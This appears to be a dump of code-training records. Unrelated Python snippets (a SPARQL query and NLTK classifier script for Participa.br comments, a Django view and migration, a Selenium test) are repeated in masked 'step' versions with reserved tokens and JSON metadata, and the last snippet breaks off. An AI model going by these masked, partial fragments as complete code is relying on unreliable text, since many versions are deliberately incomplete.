for result in results['results']['bindings']:
print(result['label']['value'] + ', ' + result['label']['xml:lang'])
<|reserved_special_token_0|>
sparql3.setQuery(PREFIX + q2)
sparql3.setReturnFormat(JSON)
<|reserved_special_token_0|>
print(
'%.2f segundos para puxar todos os nomes dos participantes do Participa.br'
% (time.time() - NOW,))
for i in results3['results']['bindings'][-10:]:
print(u'participante: ' + i['nome']['value'])
<|reserved_special_token_0|>
sparql3.setQuery(PREFIX + q)
sparql3.setReturnFormat(JSON)
<|reserved_special_token_0|>
print('%.2f segundos para puxar todos os comentários do Participa.br' % (
time.time() - NOW,))
<|reserved_special_token_0|>
print('dados lidos, processando')
<|reserved_special_token_0|>
print('feita primeira freq dist em %.2f' % (time.time() - NOW,))
<|reserved_special_token_0|>
print('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(
) - NOW,))
<|reserved_special_token_0|>
def document_features(documento):
features = {}
for palavra in palavras_escolhidas:
features['contains(%s)' % (palavra,)] = palavra in documento
return features
<|reserved_special_token_0|>
random.shuffle(msgs_)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
NOW = time.time()
sparql = SPARQLWrapper('http://dbpedia.org/sparql')
sparql.setQuery(
"""
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT ?label
WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }
"""
)
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
print('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))
for result in results['results']['bindings']:
print(result['label']['value'] + ', ' + result['label']['xml:lang'])
PREFIX = """PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX ops: <http://purl.org/socialparticipation/ops#>
PREFIX opa: <http://purl.org/socialparticipation/opa#>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX dc: <http://purl.org/dc/terms/>
PREFIX tsioc: <http://rdfs.org/sioc/types#>
PREFIX schema: <http://schema.org/>
"""
q2 = 'SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}'
NOW = time.time()
sparql3 = SPARQLWrapper('http://localhost:82/participabr/query')
sparql3.setQuery(PREFIX + q2)
sparql3.setReturnFormat(JSON)
results3 = sparql3.query().convert()
print(
'%.2f segundos para puxar todos os nomes dos participantes do Participa.br'
% (time.time() - NOW,))
for i in results3['results']['bindings'][-10:]:
print(u'participante: ' + i['nome']['value'])
NOW = time.time()
q = (
'SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}'
)
sparql3.setQuery(PREFIX + q)
sparql3.setReturnFormat(JSON)
results4 = sparql3.query().convert()
print('%.2f segundos para puxar todos os comentários do Participa.br' % (
time.time() - NOW,))
NOW = time.time()
print('dados lidos, processando')
<|reserved_special_token_0|>
palavras = string.join([i['texto']['value'].lower() for i in results4[
'results']['bindings']])
exclude = set(string.punctuation)
palavras = ''.join(ch for ch in palavras if ch not in exclude)
palavras_ = palavras.split()
print('feita primeira freq dist em %.2f' % (time.time() - NOW,))
NOW = time.time()
stopwords = set(k.corpus.stopwords.words('portuguese'))
palavras__ = [pp for pp in palavras_ if pp not in stopwords]
fdist_ = k.FreqDist(palavras__)
print('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(
) - NOW,))
palavras_escolhidas = fdist_.keys()[:200]
def document_features(documento):
features = {}
for palavra in palavras_escolhidas:
features['contains(%s)' % (palavra,)] = palavra in documento
return features
msgs = [(rr['texto']['value'], 'pos') for rr in results4['results'][
'bindings'][:1000]]
msgs2 = [(rr['texto']['value'], 'neg') for rr in results4['results'][
'bindings'][1000:2000]]
msgs_ = msgs + msgs2
random.shuffle(msgs_)
feature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]
train_set, test_set = feature_sets[1000:], feature_sets[:1000]
classifier = k.NaiveBayesClassifier.train(train_set)
<|reserved_special_token_1|>
from SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON
import time, random
NOW = time.time()
sparql = SPARQLWrapper('http://dbpedia.org/sparql')
sparql.setQuery(
"""
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT ?label
WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }
"""
)
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
print('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))
for result in results['results']['bindings']:
print(result['label']['value'] + ', ' + result['label']['xml:lang'])
PREFIX = """PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX ops: <http://purl.org/socialparticipation/ops#>
PREFIX opa: <http://purl.org/socialparticipation/opa#>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX dc: <http://purl.org/dc/terms/>
PREFIX tsioc: <http://rdfs.org/sioc/types#>
PREFIX schema: <http://schema.org/>
"""
q2 = 'SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}'
NOW = time.time()
sparql3 = SPARQLWrapper('http://localhost:82/participabr/query')
sparql3.setQuery(PREFIX + q2)
sparql3.setReturnFormat(JSON)
results3 = sparql3.query().convert()
print(
'%.2f segundos para puxar todos os nomes dos participantes do Participa.br'
% (time.time() - NOW,))
for i in results3['results']['bindings'][-10:]:
print(u'participante: ' + i['nome']['value'])
NOW = time.time()
q = (
'SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}'
)
sparql3.setQuery(PREFIX + q)
sparql3.setReturnFormat(JSON)
results4 = sparql3.query().convert()
print('%.2f segundos para puxar todos os comentários do Participa.br' % (
time.time() - NOW,))
NOW = time.time()
print('dados lidos, processando')
import string, nltk as k
palavras = string.join([i['texto']['value'].lower() for i in results4[
'results']['bindings']])
exclude = set(string.punctuation)
palavras = ''.join(ch for ch in palavras if ch not in exclude)
palavras_ = palavras.split()
print('feita primeira freq dist em %.2f' % (time.time() - NOW,))
NOW = time.time()
stopwords = set(k.corpus.stopwords.words('portuguese'))
palavras__ = [pp for pp in palavras_ if pp not in stopwords]
fdist_ = k.FreqDist(palavras__)
print('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(
) - NOW,))
palavras_escolhidas = fdist_.keys()[:200]
def document_features(documento):
features = {}
for palavra in palavras_escolhidas:
features['contains(%s)' % (palavra,)] = palavra in documento
return features
msgs = [(rr['texto']['value'], 'pos') for rr in results4['results'][
'bindings'][:1000]]
msgs2 = [(rr['texto']['value'], 'neg') for rr in results4['results'][
'bindings'][1000:2000]]
msgs_ = msgs + msgs2
random.shuffle(msgs_)
feature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]
train_set, test_set = feature_sets[1000:], feature_sets[:1000]
classifier = k.NaiveBayesClassifier.train(train_set)
<|reserved_special_token_1|>
#-*- coding: utf-8 -*-
from SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON
import time, random
# testes
NOW=time.time()
sparql = SPARQLWrapper("http://dbpedia.org/sparql")
sparql.setQuery("""
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT ?label
WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }
""")
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
print("%.2f segundos para consultar a dbpedia"%(time.time()-NOW,))
for result in results["results"]["bindings"]:
print(result["label"]["value"]+", "+result["label"]["xml:lang"])
PREFIX="""PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
PREFIX ops: <http://purl.org/socialparticipation/ops#>
PREFIX opa: <http://purl.org/socialparticipation/opa#>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
PREFIX dc: <http://purl.org/dc/terms/>
PREFIX tsioc: <http://rdfs.org/sioc/types#>
PREFIX schema: <http://schema.org/>
"""
q2="SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}"
NOW=time.time()
sparql3 = SPARQLWrapper("http://localhost:82/participabr/query")
#sparql3 = SPARQLWrapper("http://200.144.255.210:8082/participabr/query")
sparql3.setQuery(PREFIX+q2)
sparql3.setReturnFormat(JSON)
results3 = sparql3.query().convert()
print("%.2f segundos para puxar todos os nomes dos participantes do Participa.br"%(time.time()-NOW,))
for i in results3["results"]["bindings"][-10:]: print(u"participante: " +i["nome"]["value"])
NOW=time.time()
q="SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}"
sparql3.setQuery(PREFIX+q)
sparql3.setReturnFormat(JSON)
results4 = sparql3.query().convert()
print("%.2f segundos para puxar todos os comentários do Participa.br"%(time.time()-NOW,))
NOW=time.time()
print("dados lidos, processando")
import string, nltk as k
# histograma com as palavras
palavras=string.join([i["texto"]["value"].lower() for i in results4["results"]["bindings"]])
exclude = set(string.punctuation)
palavras = ''.join(ch for ch in palavras if ch not in exclude)
palavras_=palavras.split()
#fdist=k.FreqDist(palavras_)
print("feita primeira freq dist em %.2f"%(time.time()-NOW,))
NOW=time.time()
stopwords = set(k.corpus.stopwords.words('portuguese'))
palavras__=[pp for pp in palavras_ if pp not in stopwords]
fdist_=k.FreqDist(palavras__)
print("feita segunda freq dist (retiradas stopwords) em %.2f"%(time.time()-NOW,))
#NOW=time.time()
#stemmer = k.stem.RSLPStemmer()
#palavras___=[stemmer.stem(pp) for pp in palavras__]
#fdist__=k.FreqDist(palavras___)
#print("feita terceira freq dist (radicalizada) em %.2f"%(time.time()-NOW,))
##################
# bebe comentarios do endpoint sparql.
# guarda 10 e os classifica na mão
# faz histograma de todas as palavras
# escolhe as mais frequentes ou com offset
# ou as menos frequentes
# faz feture vector com elas.
# escolhendo as 200 palavras mais frequentes
palavras_escolhidas=fdist_.keys()[:200]
# outras features que podemos escolher é:
# *) número de palavras terminadas em a, o, e ou s
# *) tamanho médio das palavras utilizadas
# *) uso das stopwords
# é necessário um conjunto maior de classificações na mão
# para julgar qual parte do histograma
# é melhor de ser considerada.
#########
def document_features(documento):
features={}
for palavra in palavras_escolhidas:
features["contains(%s)"%(palavra,)]=(palavra in documento)
return features
# fazendo com classes dummy
msgs= [(rr["texto"]["value"],"pos") for rr in results4["results"]["bindings"][:1000]]
msgs2=[(rr["texto"]["value"],"neg") for rr in results4["results"]["bindings"][1000:2000]]
msgs_=msgs+msgs2
random.shuffle(msgs_)
feature_sets=[(document_features(msg[0]),msg[1]) for msg in msgs_]
train_set, test_set = feature_sets[1000:], feature_sets[:1000]
classifier = k.NaiveBayesClassifier.train(train_set)
########
# As mais frequentes podem ser úteis já que os comentários
# são pequenos e queremos que o vetor de atributos tenha informação
# As menos frequentes são as palavras mais incomuns, informativas
# para detecção de nichos do autor
# As de incidência intermediária são consideradas as mais representativas
# do assunto
|
flexible
|
{
"blob_id": "c5b50420788ddde7483a46c66aca3922ddb47952",
"index": 6199,
"step-1": "<mask token>\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\n<mask token>\n",
"step-2": "<mask token>\nsparql.setQuery(\n \"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\"\n )\nsparql.setReturnFormat(JSON)\n<mask token>\nprint('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))\nfor result in results['results']['bindings']:\n print(result['label']['value'] + ', ' + result['label']['xml:lang'])\n<mask token>\nsparql3.setQuery(PREFIX + q2)\nsparql3.setReturnFormat(JSON)\n<mask token>\nprint(\n '%.2f segundos para puxar todos os nomes dos participantes do Participa.br'\n % (time.time() - NOW,))\nfor i in results3['results']['bindings'][-10:]:\n print(u'participante: ' + i['nome']['value'])\n<mask token>\nsparql3.setQuery(PREFIX + q)\nsparql3.setReturnFormat(JSON)\n<mask token>\nprint('%.2f segundos para puxar todos os comentários do Participa.br' % (\n time.time() - NOW,))\n<mask token>\nprint('dados lidos, processando')\n<mask token>\nprint('feita primeira freq dist em %.2f' % (time.time() - NOW,))\n<mask token>\nprint('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(\n ) - NOW,))\n<mask token>\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\n<mask token>\nrandom.shuffle(msgs_)\n<mask token>\n",
"step-3": "<mask token>\nNOW = time.time()\nsparql = SPARQLWrapper('http://dbpedia.org/sparql')\nsparql.setQuery(\n \"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\"\n )\nsparql.setReturnFormat(JSON)\nresults = sparql.query().convert()\nprint('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))\nfor result in results['results']['bindings']:\n print(result['label']['value'] + ', ' + result['label']['xml:lang'])\nPREFIX = \"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX ops: <http://purl.org/socialparticipation/ops#>\nPREFIX opa: <http://purl.org/socialparticipation/opa#>\nPREFIX foaf: <http://xmlns.com/foaf/0.1/>\nPREFIX dc: <http://purl.org/dc/terms/>\nPREFIX tsioc: <http://rdfs.org/sioc/types#>\nPREFIX schema: <http://schema.org/>\n\"\"\"\nq2 = 'SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}'\nNOW = time.time()\nsparql3 = SPARQLWrapper('http://localhost:82/participabr/query')\nsparql3.setQuery(PREFIX + q2)\nsparql3.setReturnFormat(JSON)\nresults3 = sparql3.query().convert()\nprint(\n '%.2f segundos para puxar todos os nomes dos participantes do Participa.br'\n % (time.time() - NOW,))\nfor i in results3['results']['bindings'][-10:]:\n print(u'participante: ' + i['nome']['value'])\nNOW = time.time()\nq = (\n 'SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}'\n )\nsparql3.setQuery(PREFIX + q)\nsparql3.setReturnFormat(JSON)\nresults4 = sparql3.query().convert()\nprint('%.2f segundos para puxar todos os comentários do Participa.br' % (\n time.time() - NOW,))\nNOW = time.time()\nprint('dados lidos, processando')\n<mask token>\npalavras = string.join([i['texto']['value'].lower() for i in results4[\n 'results']['bindings']])\nexclude = set(string.punctuation)\npalavras = ''.join(ch for ch in palavras if ch not in exclude)\npalavras_ = palavras.split()\nprint('feita primeira freq dist em %.2f' % (time.time() - NOW,))\nNOW = time.time()\nstopwords = set(k.corpus.stopwords.words('portuguese'))\npalavras__ = [pp for pp in palavras_ if pp not in stopwords]\nfdist_ = k.FreqDist(palavras__)\nprint('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(\n ) - NOW,))\npalavras_escolhidas = fdist_.keys()[:200]\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\nmsgs = [(rr['texto']['value'], 'pos') for rr in results4['results'][\n 'bindings'][:1000]]\nmsgs2 = [(rr['texto']['value'], 'neg') for rr in results4['results'][\n 'bindings'][1000:2000]]\nmsgs_ = msgs + msgs2\nrandom.shuffle(msgs_)\nfeature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]\ntrain_set, test_set = feature_sets[1000:], feature_sets[:1000]\nclassifier = k.NaiveBayesClassifier.train(train_set)\n",
"step-4": "from SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON\nimport time, random\nNOW = time.time()\nsparql = SPARQLWrapper('http://dbpedia.org/sparql')\nsparql.setQuery(\n \"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\"\n )\nsparql.setReturnFormat(JSON)\nresults = sparql.query().convert()\nprint('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))\nfor result in results['results']['bindings']:\n print(result['label']['value'] + ', ' + result['label']['xml:lang'])\nPREFIX = \"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX ops: <http://purl.org/socialparticipation/ops#>\nPREFIX opa: <http://purl.org/socialparticipation/opa#>\nPREFIX foaf: <http://xmlns.com/foaf/0.1/>\nPREFIX dc: <http://purl.org/dc/terms/>\nPREFIX tsioc: <http://rdfs.org/sioc/types#>\nPREFIX schema: <http://schema.org/>\n\"\"\"\nq2 = 'SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}'\nNOW = time.time()\nsparql3 = SPARQLWrapper('http://localhost:82/participabr/query')\nsparql3.setQuery(PREFIX + q2)\nsparql3.setReturnFormat(JSON)\nresults3 = sparql3.query().convert()\nprint(\n '%.2f segundos para puxar todos os nomes dos participantes do Participa.br'\n % (time.time() - NOW,))\nfor i in results3['results']['bindings'][-10:]:\n print(u'participante: ' + i['nome']['value'])\nNOW = time.time()\nq = (\n 'SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}'\n )\nsparql3.setQuery(PREFIX + q)\nsparql3.setReturnFormat(JSON)\nresults4 = sparql3.query().convert()\nprint('%.2f segundos para puxar todos os comentários do Participa.br' % (\n time.time() - NOW,))\nNOW = time.time()\nprint('dados lidos, processando')\nimport string, nltk as k\npalavras = string.join([i['texto']['value'].lower() for i in results4[\n 'results']['bindings']])\nexclude = set(string.punctuation)\npalavras = ''.join(ch for ch in palavras if ch not in exclude)\npalavras_ = palavras.split()\nprint('feita primeira freq dist em %.2f' % (time.time() - NOW,))\nNOW = time.time()\nstopwords = set(k.corpus.stopwords.words('portuguese'))\npalavras__ = [pp for pp in palavras_ if pp not in stopwords]\nfdist_ = k.FreqDist(palavras__)\nprint('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(\n ) - NOW,))\npalavras_escolhidas = fdist_.keys()[:200]\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\nmsgs = [(rr['texto']['value'], 'pos') for rr in results4['results'][\n 'bindings'][:1000]]\nmsgs2 = [(rr['texto']['value'], 'neg') for rr in results4['results'][\n 'bindings'][1000:2000]]\nmsgs_ = msgs + msgs2\nrandom.shuffle(msgs_)\nfeature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]\ntrain_set, test_set = feature_sets[1000:], feature_sets[:1000]\nclassifier = k.NaiveBayesClassifier.train(train_set)\n",
"step-5": "#-*- coding: utf-8 -*-\nfrom SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON\nimport time, random\n\n# testes\nNOW=time.time()\nsparql = SPARQLWrapper(\"http://dbpedia.org/sparql\")\nsparql.setQuery(\"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\")\nsparql.setReturnFormat(JSON)\nresults = sparql.query().convert()\nprint(\"%.2f segundos para consultar a dbpedia\"%(time.time()-NOW,))\n\nfor result in results[\"results\"][\"bindings\"]:\n print(result[\"label\"][\"value\"]+\", \"+result[\"label\"][\"xml:lang\"])\n\nPREFIX=\"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX ops: <http://purl.org/socialparticipation/ops#>\nPREFIX opa: <http://purl.org/socialparticipation/opa#>\nPREFIX foaf: <http://xmlns.com/foaf/0.1/>\nPREFIX dc: <http://purl.org/dc/terms/>\nPREFIX tsioc: <http://rdfs.org/sioc/types#>\nPREFIX schema: <http://schema.org/>\n\"\"\"\n\nq2=\"SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}\"\nNOW=time.time()\nsparql3 = SPARQLWrapper(\"http://localhost:82/participabr/query\")\n#sparql3 = SPARQLWrapper(\"http://200.144.255.210:8082/participabr/query\")\nsparql3.setQuery(PREFIX+q2)\nsparql3.setReturnFormat(JSON)\nresults3 = sparql3.query().convert()\nprint(\"%.2f segundos para puxar todos os nomes dos participantes do Participa.br\"%(time.time()-NOW,))\n\nfor i in results3[\"results\"][\"bindings\"][-10:]: print(u\"participante: \" +i[\"nome\"][\"value\"])\n\nNOW=time.time()\nq=\"SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}\"\nsparql3.setQuery(PREFIX+q)\nsparql3.setReturnFormat(JSON)\nresults4 = sparql3.query().convert()\nprint(\"%.2f segundos para puxar todos os comentários do Participa.br\"%(time.time()-NOW,))\n\nNOW=time.time()\nprint(\"dados lidos, processando\")\nimport string, nltk as k\n# histograma com as palavras\npalavras=string.join([i[\"texto\"][\"value\"].lower() for i in results4[\"results\"][\"bindings\"]])\nexclude = set(string.punctuation)\npalavras = ''.join(ch for ch in palavras if ch not in exclude)\npalavras_=palavras.split()\n#fdist=k.FreqDist(palavras_)\nprint(\"feita primeira freq dist em %.2f\"%(time.time()-NOW,))\n\nNOW=time.time()\nstopwords = set(k.corpus.stopwords.words('portuguese'))\npalavras__=[pp for pp in palavras_ if pp not in stopwords]\nfdist_=k.FreqDist(palavras__)\nprint(\"feita segunda freq dist (retiradas stopwords) em %.2f\"%(time.time()-NOW,))\n\n#NOW=time.time()\n#stemmer = k.stem.RSLPStemmer()\n#palavras___=[stemmer.stem(pp) for pp in palavras__]\n#fdist__=k.FreqDist(palavras___)\n#print(\"feita terceira freq dist (radicalizada) em %.2f\"%(time.time()-NOW,))\n\n##################\n# bebe comentarios do endpoint sparql.\n# guarda 10 e os classifica na mão\n\n# faz histograma de todas as palavras\n# escolhe as mais frequentes ou com offset\n# ou as menos frequentes\n# faz feture vector com elas.\n# escolhendo as 200 palavras mais frequentes\npalavras_escolhidas=fdist_.keys()[:200]\n# outras features que podemos escolher é:\n# *) número de palavras terminadas em a, o, e ou s\n# *) tamanho médio das palavras utilizadas\n# *) uso das stopwords\n\n# é necessário um conjunto maior de classificações na mão\n# para julgar qual parte do histograma\n# é melhor de ser considerada.\n\n#########\ndef document_features(documento):\n features={}\n for palavra in palavras_escolhidas:\n features[\"contains(%s)\"%(palavra,)]=(palavra in documento)\n return features\n# fazendo com classes dummy\nmsgs= [(rr[\"texto\"][\"value\"],\"pos\") for rr in results4[\"results\"][\"bindings\"][:1000]]\nmsgs2=[(rr[\"texto\"][\"value\"],\"neg\") for rr in results4[\"results\"][\"bindings\"][1000:2000]]\nmsgs_=msgs+msgs2\nrandom.shuffle(msgs_)\nfeature_sets=[(document_features(msg[0]),msg[1]) for msg in msgs_]\ntrain_set, test_set = feature_sets[1000:], feature_sets[:1000]\nclassifier = k.NaiveBayesClassifier.train(train_set)\n\n########\n# As mais frequentes podem ser úteis já que os comentários\n# são pequenos e queremos que o vetor de atributos tenha informação\n\n# As menos frequentes são as palavras mais incomuns, informativas\n# para detecção de nichos do autor\n\n# As de incidência intermediária são consideradas as mais representativas\n# do assunto\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.shortcuts import render, redirect
from django.utils.crypto import get_random_string
def index(request):
if not "word" in request.session:
request.session["word"] = 'Empty'
if not "count" in request.session:
request.session["count"] = 0
if request.method == "GET":
return render(request, "app_one/index.html")
if request.method == "POST":
request.session['word'] = get_random_string(length=14)
request.session['count'] += 1
return redirect('/')
# def generator(request):
# return redirect('/')
def reset(request):
request.session['count'] = 0
return redirect('/')
|
normal
|
{
"blob_id": "2ec5e43860a1d248a2f5cd1abc26676342275425",
"index": 8589,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef reset(request):\n request.session['count'] = 0\n return redirect('/')\n",
"step-3": "<mask token>\n\n\ndef index(request):\n if not 'word' in request.session:\n request.session['word'] = 'Empty'\n if not 'count' in request.session:\n request.session['count'] = 0\n if request.method == 'GET':\n return render(request, 'app_one/index.html')\n if request.method == 'POST':\n request.session['word'] = get_random_string(length=14)\n request.session['count'] += 1\n return redirect('/')\n\n\ndef reset(request):\n request.session['count'] = 0\n return redirect('/')\n",
"step-4": "from django.shortcuts import render, redirect\nfrom django.utils.crypto import get_random_string\n\n\ndef index(request):\n if not 'word' in request.session:\n request.session['word'] = 'Empty'\n if not 'count' in request.session:\n request.session['count'] = 0\n if request.method == 'GET':\n return render(request, 'app_one/index.html')\n if request.method == 'POST':\n request.session['word'] = get_random_string(length=14)\n request.session['count'] += 1\n return redirect('/')\n\n\ndef reset(request):\n request.session['count'] = 0\n return redirect('/')\n",
"step-5": "from django.shortcuts import render, redirect\nfrom django.utils.crypto import get_random_string\n\n\ndef index(request):\n if not \"word\" in request.session:\n request.session[\"word\"] = 'Empty'\n if not \"count\" in request.session:\n request.session[\"count\"] = 0\n if request.method == \"GET\":\n return render(request, \"app_one/index.html\")\n if request.method == \"POST\":\n request.session['word'] = get_random_string(length=14)\n request.session['count'] += 1\n return redirect('/')\n\n# def generator(request):\n \n# return redirect('/')\n\ndef reset(request):\n request.session['count'] = 0\n return redirect('/')",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-05-22 00:19
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('classroom', '0003_remove_anouncements_classroom'),
]
operations = [
migrations.AddField(
model_name='anouncements',
name='classrm',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='anouncements', to='classroom.Classroom'),
),
]
|
normal
|
{
"blob_id": "e9659555938211d067919ee5e0083efb29d42d7b",
"index": 8600,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('classroom', '0003_remove_anouncements_classroom')]\n operations = [migrations.AddField(model_name='anouncements', name=\n 'classrm', field=models.ForeignKey(blank=True, null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name='anouncements', to\n ='classroom.Classroom'))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('classroom', '0003_remove_anouncements_classroom')]\n operations = [migrations.AddField(model_name='anouncements', name=\n 'classrm', field=models.ForeignKey(blank=True, null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name='anouncements', to\n ='classroom.Classroom'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-05-22 00:19\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('classroom', '0003_remove_anouncements_classroom'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='anouncements',\n name='classrm',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='anouncements', to='classroom.Classroom'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_guest_should_see_button_add_to_basket(browser):
browser.get(link)
btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'
found_button = WebDriverWait(browser, 5).until(EC.
element_to_be_clickable((By.CLASS_NAME, btn_add)))
assert found_button != False, 'Do not found the button of add to basket'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
link = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'
def test_guest_should_see_button_add_to_basket(browser):
browser.get(link)
btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'
found_button = WebDriverWait(browser, 5).until(EC.
element_to_be_clickable((By.CLASS_NAME, btn_add)))
assert found_button != False, 'Do not found the button of add to basket'
<|reserved_special_token_1|>
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
link = 'http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'
def test_guest_should_see_button_add_to_basket(browser):
browser.get(link)
btn_add = 'btn.btn-lg.btn-primary.btn-add-to-basket'
found_button = WebDriverWait(browser, 5).until(EC.
element_to_be_clickable((By.CLASS_NAME, btn_add)))
assert found_button != False, 'Do not found the button of add to basket'
<|reserved_special_token_1|>
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
link = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/"
def test_guest_should_see_button_add_to_basket(browser):
browser.get(link)
btn_add = "btn.btn-lg.btn-primary.btn-add-to-basket"
found_button = WebDriverWait(browser, 5).until(
EC.element_to_be_clickable((By.CLASS_NAME, btn_add))
)
